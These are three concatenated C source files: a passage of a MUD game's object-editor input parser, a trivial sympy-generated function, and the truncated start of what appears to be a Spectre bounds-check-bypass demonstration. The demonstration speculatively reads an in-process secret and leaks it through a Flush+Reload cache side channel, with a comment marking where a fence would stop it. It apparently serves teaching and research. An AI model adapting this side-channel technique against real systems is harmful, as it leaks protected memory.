0; GET_OBJ_VAL(OLC_OBJ(d), 1) = 0; GET_OBJ_VAL(OLC_OBJ(d), 2) = 0; GET_OBJ_VAL(OLC_OBJ(d), 3) = 0; GET_OBJ_VAL(OLC_OBJ(d), 4) = 0; GET_OBJ_VAL(OLC_OBJ(d), 5) = 0; GET_OBJ_VAL(OLC_OBJ(d), 6) = 0; GET_OBJ_VAL(OLC_OBJ(d), 7) = 0; GET_OBJ_VAL(OLC_OBJ(d), 8) = 0; GET_OBJ_VAL(OLC_OBJ(d), 9) = 0; GET_OBJ_VAL(OLC_OBJ(d), 10) = 0; GET_OBJ_VAL(OLC_OBJ(d), 11) = 0; GET_OBJ_VAL(OLC_OBJ(d), 12) = 0; GET_OBJ_VAL(OLC_OBJ(d), 13) = 0; GET_OBJ_VAL(OLC_OBJ(d), 14) = 0; GET_OBJ_VAL(OLC_OBJ(d), 15) = 0; OLC_VAL(d) = 1; oedit_disp_val1_menu(d); break; case 'd': case 'D': oedit_disp_prompt_apply_menu(d); break; case 'e': case 'E': /* If extra descriptions don't exist. */ if (OLC_OBJ(d)->ex_description == NULL) { CREATE(OLC_OBJ(d)->ex_description, struct extra_descr_data, 1); OLC_OBJ(d)->ex_description->next = NULL; } OLC_DESC(d) = OLC_OBJ(d)->ex_description; oedit_disp_extradesc_menu(d); break; case 'm': case 'M': write_to_output(d, "Enter new minimum level: "); OLC_MODE(d) = OEDIT_LEVEL; break; case 'p': case 'P': oedit_disp_perm_menu(d); OLC_MODE(d) = OEDIT_PERM; break; case 's': case 'S': OLC_SCRIPT_EDIT_MODE(d) = SCRIPT_MAIN_MENU; dg_script_menu(d); return; case 't': case 'T': oedit_disp_prompt_spellbook_menu(d); break; case 'w': case 'W': write_to_output(d, "Copy what object? "); OLC_MODE(d) = OEDIT_COPY; break; case 'x': case 'X': write_to_output(d, "Are you sure you want to delete this object? "); OLC_MODE(d) = OEDIT_DELETE; break; case 'f': case 'F': oedit_disp_weapon_spells(d); OLC_MODE(d) = OEDIT_WEAPON_SPELL_MENU; break; case 'j': case 'J': oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; break; default: oedit_disp_menu(d); break; } return; /* end of OEDIT_MAIN_MENU */ case OLC_SCRIPT_EDIT: if (dg_script_edit_parse(d, arg)) return; break; case OEDIT_KEYWORD: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->name) free(OLC_OBJ(d)->name); OLC_OBJ(d)->name = str_udup(arg); break; case OEDIT_SHORTDESC: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->short_description) free(OLC_OBJ(d)->short_description); OLC_OBJ(d)->short_description = str_udup(arg); break; case OEDIT_LONGDESC: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->description) free(OLC_OBJ(d)->description); OLC_OBJ(d)->description = str_udup(arg); break; case OEDIT_TYPE: number = atoi(arg); if ((number < 0) || (number >= NUM_ITEM_TYPES)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_TYPE(OLC_OBJ(d)) = number; /* what's the boundschecking worth if we don't do this ? -- Welcor */ GET_OBJ_VAL(OLC_OBJ(d), 0) = GET_OBJ_VAL(OLC_OBJ(d), 1) = GET_OBJ_VAL(OLC_OBJ(d), 2) = GET_OBJ_VAL(OLC_OBJ(d), 3) = 0; break; case OEDIT_PROF: number = atoi(arg); if ((number < 0) || (number >= NUM_ITEM_PROFS)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_PROF(OLC_OBJ(d)) = number; break; case OEDIT_MATERIAL: number = atoi(arg); if ((number < 1) || (number >= NUM_MATERIALS)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_MATERIAL(OLC_OBJ(d)) = number; break; case OEDIT_EXTRAS: number = atoi(arg); if ((number < 0) || (number > NUM_ITEM_FLAGS)) { oedit_disp_extra_menu(d); return; } else if (number == 0) break; else { TOGGLE_BIT_AR(GET_OBJ_EXTRA(OLC_OBJ(d)), (number - 1)); oedit_disp_extra_menu(d); return; } case OEDIT_WEAR: number = atoi(arg); if ((number < 0) || (number > NUM_ITEM_WEARS)) { write_to_output(d, "That's not a valid choice!\r\n"); oedit_disp_wear_menu(d); return; } else if (number == 0) /* Quit. */ break; else { TOGGLE_BIT_AR(GET_OBJ_WEAR(OLC_OBJ(d)), (number - 1)); oedit_disp_wear_menu(d); return; } case OEDIT_WEIGHT: GET_OBJ_WEIGHT(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_WEIGHT); break; case OEDIT_SIZE: number = atoi(arg) - 1; GET_OBJ_SIZE(OLC_OBJ(d)) = LIMIT(number, 0, NUM_SIZES - 1); break; case OEDIT_COST: GET_OBJ_COST(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_COST); break; case OEDIT_COSTPERDAY: GET_OBJ_RENT(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_RENT); break; case OEDIT_TIMER: GET_OBJ_TIMER(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_TIMER); break; case OEDIT_LEVEL: GET_OBJ_LEVEL(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, LVL_IMPL); break; case OEDIT_PERM: if ((number = atoi(arg)) == 0) break; if (number > 0 && number <= NUM_AFF_FLAGS) { /* Setting AFF_CHARM on objects like this is dangerous. */ if (number != AFF_CHARM) { TOGGLE_BIT_AR(GET_OBJ_PERM(OLC_OBJ(d)), number); } } oedit_disp_perm_menu(d); return; case OEDIT_VALUE_1: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_INSTRUMENT: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), MAX_INSTRUMENTS - 1); break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), 1); break; case ITEM_FURNITURE: if (number < 0 || number > MAX_PEOPLE) oedit_disp_val1_menu(d); else { GET_OBJ_VAL(OLC_OBJ(d), 0) = number; oedit_disp_val2_menu(d); } break; /* val[0] is AC from old system setup */ /* ITEM_ARMOR */ case ITEM_WEAPON: /* function from treasure.c */ set_weapon_object(OLC_OBJ(d), MIN(MAX(atoi(arg), 0), NUM_WEAPON_TYPES - 1)); /* Skip a few. */ oedit_disp_val5_menu(d); return; case ITEM_TREASURE_CHEST: if (atoi(arg) <= LOOTBOX_LEVEL_UNDEFINED || atoi(arg) >= NUM_LOOTBOX_LEVELS) { write_to_output(d, "Invalid option. Try again: "); return; } GET_OBJ_VAL(OLC_OBJ(d), 0) = atoi(arg); oedit_disp_val2_menu(d); return; case ITEM_FIREWEAPON: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), NUM_RANGED_WEAPONS - 1); break; case ITEM_MISSILE: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 1, NUM_AMMO_TYPES - 1); /* jump to break probability */ oedit_disp_val3_menu(d); return; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), -1, MAX_CONTAINER_SIZE); break; /* NewCraft */ case ITEM_BLUEPRINT: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 0, 1000); break; /* special values for worn gear, example monk-gloves will apply an enhancement bonus to damage */ case ITEM_WORN: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 1, 10); break; default: GET_OBJ_VAL(OLC_OBJ(d), 0) = atoi(arg); } /* proceed to menu 2 */ oedit_disp_val2_menu(d); return; case OEDIT_VALUE_2: /* Here, I do need to check for out of range values. */ number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_INSTRUMENT: /* reduce difficulty */ GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 0, 30); oedit_disp_val3_menu(d); break; case ITEM_TREASURE_CHEST: if (atoi(arg) <= LOOTBOX_TYPE_UNDEFINED || atoi(arg) >= NUM_LOOTBOX_TYPES) { write_to_output(d, "Invalid option. Try again: "); return; } GET_OBJ_VAL(OLC_OBJ(d), 1) = atoi(arg); oedit_disp_val3_menu(d); break; case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) GET_OBJ_VAL(OLC_OBJ(d), 1) = -1; else GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, NUM_SPELLS); oedit_disp_val3_menu(d); break; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: /* Needs some special handling since we are dealing with flag values here. */ if (number < 0 || number > 4) oedit_disp_container_flags_menu(d); else if (number != 0) { TOGGLE_BIT(GET_OBJ_VAL(OLC_OBJ(d), 1), 1 << (number - 1)); OLC_VAL(d) = 1; oedit_disp_val2_menu(d); } else oedit_disp_val3_menu(d); break; case ITEM_WEAPON: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_NDICE); oedit_disp_val3_menu(d); break; case ITEM_ARMOR: /* val[0] is AC from old system setup */ /* from treasure.c - auto set some values of this item now! */ set_armor_object(OLC_OBJ(d), MIN(MAX(atoi(arg), 0), NUM_SPEC_ARMOR_TYPES - 1)); /* Skip to enhancement menu. */ oedit_disp_val5_menu(d); return; case ITEM_FIREWEAPON: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_NDICE); oedit_disp_val3_menu(d); break; case ITEM_MISSILE: //GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_SDICE); /* Skip to enhancement menu. */ //oedit_disp_val5_menu(d); //return; break; case ITEM_CLANARMOR: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, num_of_clans); oedit_disp_val3_menu(d); break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, 999999); ; oedit_disp_val3_menu(d); break; default: GET_OBJ_VAL(OLC_OBJ(d), 1) = number; oedit_disp_val3_menu(d); } return; case OEDIT_VALUE_3: number = atoi(arg); /* Quick'n'easy error checking. */ switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) { GET_OBJ_VAL(OLC_OBJ(d), 2) = -1; oedit_disp_val4_menu(d); return; } min_val = 1; max_val = NUM_SPELLS; break; case ITEM_INSTRUMENT: /* instrument level */ min_val = 0; max_val = 10; break; case ITEM_WEAPON: min_val = 1; max_val = MAX_WEAPON_SDICE; break; case ITEM_FIREWEAPON: min_val = 2; max_val = 98; break; case ITEM_MISSILE: /* break probability */ min_val = 2; max_val = 98; GET_OBJ_VAL(OLC_OBJ(d), 2) = LIMIT(number, min_val, max_val); /* jump to enhancement bonus */ oedit_disp_val5_menu(d); return; case ITEM_WAND: case ITEM_STAFF: min_val = 0; max_val = 20; break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: min_val = 0; max_val = NUM_LIQ_TYPES - 1; number--; break; case ITEM_KEY: min_val = 0; max_val = 400000000; break; case ITEM_PORTAL: min_val = 1; max_val = 400000000; break; case ITEM_SWITCH: min_val = 0; max_val = 5; break; default: min_val = -200000000; max_val = 200000000; } GET_OBJ_VAL(OLC_OBJ(d), 2) = LIMIT(number, min_val, max_val); oedit_disp_val4_menu(d); return; case OEDIT_VALUE_4: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) { GET_OBJ_VAL(OLC_OBJ(d), 3) = -1; oedit_disp_menu(d); return; } min_val = 1; max_val = NUM_SPELLS; break; case ITEM_WAND: case ITEM_STAFF: min_val = 1; max_val = NUM_SPELLS; break; case ITEM_INSTRUMENT: /* breakability: 0 = indestructable, 2000 = break on first use * recommended values are 0-30 */ min_val = 0; max_val = 2000; break; case ITEM_WEAPON: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break; case ITEM_FIREWEAPON: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 3) = LIMIT(number, 0, 2); oedit_disp_menu(d); return; /* case ITEM_MISSILE: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break;*/ default: min_val = -65000; max_val = 65000; break; } GET_OBJ_VAL(OLC_OBJ(d), 3) = LIMIT(number, min_val, max_val); oedit_disp_val5_menu(d); return; /*this is enhancement bonus so far*/ case OEDIT_VALUE_5: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_MISSILE: min_val = 0; max_val = 10; break; case ITEM_WEAPON: min_val = 0; max_val = 10; break; case ITEM_ARMOR: case ITEM_CLANARMOR: min_val = 0; max_val = 10; break; default: min_val = -65000; max_val = 65000; break; } GET_OBJ_VAL(OLC_OBJ(d), 4) = LIMIT(number, min_val, max_val); break; // } // } case OEDIT_PROMPT_APPLY: if ((number = atoi(arg)) == 0) break; else if (number < 0 || number > MAX_OBJ_AFFECT) { oedit_disp_prompt_apply_menu(d); return; } OLC_VAL(d) = number - 1; OLC_MODE(d) = OEDIT_APPLY; oedit_disp_apply_menu(d); return; case OEDIT_APPLY: if (((number = atoi(arg)) == 0) || ((number = atoi(arg)) == 1)) { OLC_OBJ(d)->affected[OLC_VAL(d)].location = 0; OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = 0; oedit_disp_prompt_apply_menu(d); } else if (number < 0 || number > NUM_APPLIES) oedit_disp_apply_menu(d); else { int counter; /* add in check here if already applied.. deny builders another */ if (GET_LEVEL(d->character) < LVL_IMPL) { for (counter = 0; counter < MAX_OBJ_AFFECT; counter++) { if (OLC_OBJ(d)->affected[counter].location == number) { write_to_output(d, "Object already has that apply."); return; } } } OLC_OBJ(d)->affected[OLC_VAL(d)].location = number - 1; write_to_output(d, "Modifier : "); OLC_MODE(d) = OEDIT_APPLYMOD; } return; case OEDIT_APPLYMOD: OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = atoi(arg); oedit_disp_apply_prompt_bonus_type_menu(d); return; case OEDIT_APPLYSPEC: if (isdigit(*arg)) OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = atoi(arg); else switch (OLC_OBJ(d)->affected[OLC_VAL(d)].location) { /* case APPLY_SKILL: number = find_skill_num(arg, SKTYPE_SKILL); if (number > -1) OLC_OBJ(d)->affected[OLC_VAL(d)].specific = number; break; */ case APPLY_FEAT: number = find_feat_num(arg); if (number > -1) OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = number; break; default: OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = 0; break; } oedit_disp_apply_prompt_bonus_type_menu(d); return; case OEDIT_APPLY_BONUS_TYPE: number = atoi(arg); if (number < 0 || number > NUM_BONUS_TYPES) { write_to_output(d, "Invalid bonus type, please enter a valid bonus type."); oedit_disp_apply_prompt_bonus_type_menu(d); return; } OLC_OBJ(d)->affected[OLC_VAL(d)].bonus_type = atoi(arg); oedit_disp_prompt_apply_menu(d); return; case OEDIT_EXTRADESC_KEY: if (genolc_checkstring(d, arg)) { if (OLC_DESC(d)->keyword) free(OLC_DESC(d)->keyword); OLC_DESC(d)->keyword = str_udup(arg); } oedit_disp_extradesc_menu(d); return; case OEDIT_EXTRADESC_MENU: switch ((number = atoi(arg))) { case 0: if (!OLC_DESC(d)->keyword || !OLC_DESC(d)->description) { struct extra_descr_data *temp; if (OLC_DESC(d)->keyword) free(OLC_DESC(d)->keyword); if (OLC_DESC(d)->description) free(OLC_DESC(d)->description); /* Clean up pointers */ REMOVE_FROM_LIST(OLC_DESC(d), OLC_OBJ(d)->ex_description, next); free(OLC_DESC(d)); OLC_DESC(d) = NULL; } break; case 1: OLC_MODE(d) = OEDIT_EXTRADESC_KEY; write_to_output(d, "Enter keywords, separated by spaces :-\r\n| "); return; case 2: OLC_MODE(d) = OEDIT_EXTRADESC_DESCRIPTION; send_editor_help(d); write_to_output(d, "Enter the extra description:\r\n\r\n"); if (OLC_DESC(d)->description) { write_to_output(d, "%s", OLC_DESC(d)->description); oldtext = strdup(OLC_DESC(d)->description); } string_write(d, &OLC_DESC(d)->description, MAX_MESSAGE_LENGTH, 0, oldtext); OLC_VAL(d) = 1; return; case 3: /* Only go to the next description if this one is finished. */ if (OLC_DESC(d)->keyword && OLC_DESC(d)->description) { struct extra_descr_data *new_extra; if (OLC_DESC(d)->next) OLC_DESC(d) = OLC_DESC(d)->next; else { /* Make new extra description and attach at end. */ CREATE(new_extra, struct extra_descr_data, 1); OLC_DESC(d)->next = new_extra; OLC_DESC(d) = OLC_DESC(d)->next; } } /* No break - drop into default case. */ default: oedit_disp_extradesc_menu(d); return; } break; case OEDIT_COPY: if ((number = real_object(atoi(arg))) != NOTHING) { oedit_setup_existing(d, number); } else write_to_output(d, "That object does not exist.\r\n"); break; case OEDIT_DELETE: if (*arg == 'y' || *arg == 'Y') { if (delete_object(GET_OBJ_RNUM(OLC_OBJ(d))) != NOTHING) write_to_output(d, "Object deleted.\r\n"); else write_to_output(d, "Couldn't delete the object!\r\n"); cleanup_olc(d, CLEANUP_ALL); } else if (*arg == 'n' || *arg == 'N') { oedit_disp_menu(d); OLC_MODE(d) = OEDIT_MAIN_MENU; } else write_to_output(d, "Please answer 'Y' or 'N': "); return; case OEDIT_WEAPON_SPELL_MENU: if ((number = atoi(arg)) == -1) break; else if (number < 1 || number > MAX_WEAPON_SPELLS) { OLC_MODE(d) = OEDIT_MAIN_MENU; oedit_disp_menu(d); return; } OLC_VAL(d) = number - 1; OLC_MODE(d) = OEDIT_WEAPON_SPELLS; oedit_disp_spells_menu(d); return; case OEDIT_WEAPON_SPELLS: if ((number = atoi(arg)) == -1) break; else if (number < -1 || number > MAX_SPELLS) { oedit_disp_spells_menu(d); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].spellnum = number; OLC_MODE(d) = OEDIT_WEAPON_SPELL_LEVEL; send_to_char(d->character, "At what level should it be cast: "); return; case OEDIT_WEAPON_SPELL_LEVEL: if ((number = atoi(arg)) == -1) break; if (number < 1) { send_to_char(d->character, "Invalid level.\r\n"); send_to_char(d->character, "What level should the spell be cast at: "); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].level = number; send_to_char(d->character, "What percent of rounds should it go off: "); OLC_MODE(d) = OEDIT_WEAPON_SPELL_PERCENT; return; case OEDIT_WEAPON_SPELL_PERCENT: if ((number = atoi(arg)) == -1) break; if (number < 1 || number > 50) { send_to_char(d->character, "Invalid percent, must be 1-50.\r\nPlease enter the percent: "); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].percent = number; OLC_OBJ(d)->has_spells = TRUE; send_to_char(d->character, "1 for offensive, 0 for defensive spell: "); OLC_MODE(d) = OEDIT_WEAPON_SPELL_INCOMBAT; return; case OEDIT_WEAPON_SPELL_INCOMBAT: if ((number = atoi(arg)) == -1) break; if (number != 1 && number != 0) { send_to_char(d->character, "Invalid value!\r\n"); send_to_char(d->character, "1 = on = Spell will cast in combat exclusively (offensive)\r\n"); send_to_char(d->character, "0 = off = Spell will cast randomly (defensive)\r\n"); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].inCombat = number; /* Got the last of it, now go back in case of more */ OLC_MODE(d) = OEDIT_WEAPON_SPELL_MENU; oedit_disp_weapon_spells(d); return; case OEDIT_PROMPT_SPELLBOOK: if ((number = atoi(arg)) == 0) break; else if (number < 0 || number > SPELLBOOK_SIZE) { oedit_disp_prompt_spellbook_menu(d); return; } int counter; if (!OLC_OBJ(d)->sbinfo) { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); } /* look for empty spot in book */ for (counter = 0; counter < SPELLBOOK_SIZE; counter++) if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname == 0) break; /* oops no space */ if (OLC_OBJ(d)->sbinfo && counter == SPELLBOOK_SIZE) { write_to_output(d, "This spellbook is full!\r\n"); return; } OLC_VAL(d) = counter; OLC_MODE(d) = OEDIT_SPELLBOOK; oedit_disp_spellbook_menu(d); return; case OEDIT_SPELLBOOK: if ((number = atoi(arg)) == 0) { if (OLC_OBJ(d)->sbinfo) { OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = 0; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = 0; } else { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = 0; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = 0; } oedit_disp_prompt_spellbook_menu(d); } else if (number < 0 || number >= NUM_SPELLS) { oedit_disp_spellbook_menu(d); } else { int counter; /* add in check here if already applied.. deny builders another */ for (counter = 0; counter < SPELLBOOK_SIZE; counter++) { if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname == number) { write_to_output(d, "Object already has that spell."); return; } } if (!OLC_OBJ(d)->sbinfo) { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); } OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = number; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = MAX(1, lowest_spell_level(number) / 2); ; oedit_disp_prompt_spellbook_menu(d); } return; case OEDIT_WEAPON_SPECAB_MENU: switch (*arg) { case 'N': case 'n': /* Create a new special ability and assign it to the list. */ CREATE(OLC_SPECAB(d), struct obj_special_ability, 1); OLC_SPECAB(d)->next = OLC_OBJ(d)->special_abilities; OLC_OBJ(d)->special_abilities = OLC_SPECAB(d); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; OLC_VAL(d) = 1; oedit_disp_assign_weapon_specab_menu(d); break; case 'E': case 'e': write_to_output(d, "Edit which ability? : "); OLC_MODE(d) = OEDIT_EDIT_WEAPON_SPECAB; OLC_VAL(d) = 1; break; case 'D': case 'd': write_to_output(d, "Delete which ability? (-1 to cancel) : "); OLC_MODE(d) = OEDIT_DELETE_WEAPON_SPECAB; break; case 'Q': case 'q': OLC_MODE(d) = OEDIT_MAIN_MENU; oedit_disp_menu(d); break; default: write_to_output(d, "Invalid choice, try again : \r\n"); break; } return; case OEDIT_EDIT_WEAPON_SPECAB: /* Editing is the same as assign - just load the chosen specab. */ number = atoi(arg); OLC_SPECAB(d) = get_specab_by_position(OLC_OBJ(d), number); if (OLC_SPECAB(d) == NULL) { write_to_output(d, "Invalid special ability number. \r\n"); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_weapon_special_abilities_menu(d); } else { OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } return; case OEDIT_ASSIGN_WEAPON_SPECAB_MENU: switch (*arg) { case 'A': case 'a': /* Choose ability. */ oedit_weapon_specab(d); break; case 'L': case 'l': /* Set ability level */ write_to_output(d, "Enter special ability level (1-34) : "); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_LEVEL; OLC_VAL(d) = 1; break; case 'M': case 'm': /* Set activation methods */ oedit_disp_specab_activation_method_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_ACTMTD; OLC_VAL(d) = 1; break; case 'C': case 'c': /* Set command word */ write_to_output(d, "Enter command word : "); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_CMDWD; OLC_VAL(d) = 1; break; case 'V': case 'v': /* Go into value setting questions */ oedit_disp_specab_val1_menu(d); OLC_VAL(d) = 1; break; case 'Q': case 'q': OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_weapon_special_abilities_menu(d); break; default: write_to_output(d, "Invalid choice, try again : \r\n"); break; } return; case OEDIT_DELETE_WEAPON_SPECAB: if ((number = atoi(arg)) == -1) { oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; OLC_VAL(d) = 1; return; } OLC_SPECAB(d) = NULL; if (remove_special_ability(OLC_OBJ(d), number)) write_to_output(d, "Ability deleted.\r\n"); else write_to_output(d, "That ability does not exist!\r\n"); oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; return; case OEDIT_WEAPON_SPECAB: /* The user has chosen a special ability for this weapon. */ number = atoi(arg); /* No need to decrement number, we adjusted it already. */ if ((number < 0) || (number >= NUM_SPECABS)) { write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->ability = number; OLC_SPECAB(d)->level = special_ability_info[number].level; OLC_SPECAB(d)->activation_method = special_ability_info[number].activation_method; OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case OEDIT_WEAPON_SPECAB_LEVEL: number = atoi(arg); if ((number < 1) || (number > 34)) { write_to_output(d, "Invalid level, try again : "); return; } OLC_SPECAB(d)->level = number; oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; return; case OEDIT_WEAPON_SPECAB_CMDWD: OLC_SPECAB(d)->command_word = strdup(arg); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case OEDIT_WEAPON_SPECAB_ACTMTD: number = atoi(arg); if ((number < 0) || (number > NUM_ACTIVATION_METHODS)) { // added -3 to prevent eyes, ears, badge write_to_output(d, "That's not a valid choice!\r\n"); oedit_disp_specab_activation_method_menu(d); return; } else if (number == 0) { /* Quit. */ OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; } else { TOGGLE_BIT(OLC_SPECAB(d)->activation_method, (1 << (number - 1))); oedit_disp_specab_activation_method_menu(d); return; } case OEDIT_SPECAB_VALUE_1: switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: /* Val 1: NPC RACE */ number = atoi(arg); if ((number < 0) || (number >= NUM_RACE_TYPES)) { /* Value out of range. */ write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->value[0] = number; OLC_MODE(d) = OEDIT_SPECAB_VALUE_2; oedit_disp_specab_val2_menu(d); return; case ITEM_SPECAB_HORN_OF_SUMMONING: /* Val 1: VNUM of mob summoned. */ number = atoi(arg); if ((number < 0) || (number >= 12157521)) { /* Value out of range. */ write_to_output(d, "Invalid vnum, try again : "); return; } OLC_SPECAB(d)->value[0] = number; OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case WEAPON_SPECAB_SPELL_STORING: /* Val 1: SPELL NUMBER */ ; default:; } case OEDIT_SPECAB_VALUE_2: switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: /* Val 2: NPC SUBRACE */ number = atoi(arg); if ((number < 0) || (number >= NUM_SUB_RACES)) { /* Value out of range. */ write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->value[1] = number; /* Finished. */ OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case WEAPON_SPECAB_SPELL_STORING: /* Val 2: SPELL LEVEL */ ; default:; } case OEDIT_SPECAB_VALUE_3: switch (OLC_SPECAB(d)->ability) { default:; } case OEDIT_SPECAB_VALUE_4: switch (OLC_SPECAB(d)->ability) { default:; } default: mudlog(BRF, LVL_BUILDER, TRUE, "SYSERR: OLC: Reached default case in oedit_parse()!"); write_to_output(d, "Oops...\r\n"); break; } /* If we get here, we have changed something. */ OLC_VAL(d) = 1; oedit_disp_menu(d); } void oedit_string_cleanup(struct descriptor_data *d, int terminator) { switch (OLC_MODE(d)) { case OEDIT_ACTDESC: oedit_disp_menu(d); break; case OEDIT_EXTRADESC_DESCRIPTION: oedit_disp_extradesc_menu(d); break; } }
467520.c
/****************************************************************************** * Code generated with sympy 0.7.6 * * * * See http://www.sympy.org/ for more information. * * * * This file is part of 'project' * ******************************************************************************/ #include "pinky_metacarpal_pinky_dist_length_2.h" #include <math.h> double pinky_metacarpal_pinky_dist_length_2() { double pinky_metacarpal_pinky_dist_length_2_result; pinky_metacarpal_pinky_dist_length_2_result = 0; return pinky_metacarpal_pinky_dist_length_2_result; }
246518.c
#include <pthread.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include "../../../libcache/cacheutils.h" // accessible data #define DATA "data|" // inaccessible secret (following accessible data) #define SECRET "INACCESSIBLE SECRET" #define DATA_SECRET DATA SECRET unsigned char data[128]; char access_array(int x) { // flushing the data which is used in the condition increases // probability of speculation size_t len = sizeof(DATA) - 1; mfence(); flush(&len); flush(&x); // ensure data is flushed at this point mfence(); // check that only accessible part (DATA) can be accessed if((float)x / (float)len < 1) { // countermeasure: add the fence here cache_encode(data[x]); } } int main(int argc, const char **argv) { // Detect cache threshold if(!CACHE_MISS) CACHE_MISS = detect_flush_reload_threshold(); printf("[\x1b[33m*\x1b[0m] Flush+Reload Threshold: \x1b[33m%zd\x1b[0m\n", CACHE_MISS); pagesize = sysconf(_SC_PAGESIZE); char *_mem = 